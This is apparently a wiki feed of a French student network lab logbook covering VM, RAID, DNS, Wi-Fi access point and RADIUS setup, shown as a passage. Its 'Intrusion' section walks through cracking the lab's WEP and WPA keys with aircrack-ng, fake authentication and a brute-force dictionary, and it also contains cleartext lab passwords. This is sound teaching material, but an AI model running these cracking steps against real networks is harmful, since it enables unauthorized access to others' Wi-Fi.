		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Connexion_minicom.png&amp;diff=60269</id>
		<title>Fichier:Connexion minicom.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Connexion_minicom.png&amp;diff=60269"/>
				<updated>2022-11-28T23:41:55Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Freeradius_X.png&amp;diff=60267</id>
		<title>Fichier:Freeradius X.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Freeradius_X.png&amp;diff=60267"/>
				<updated>2022-11-28T23:41:29Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60266</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60266"/>
				<updated>2022-11-28T23:40:55Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Configuration du serveur RADIUS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60264</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60264"/>
				<updated>2022-11-28T23:37:36Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Point d'accès wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
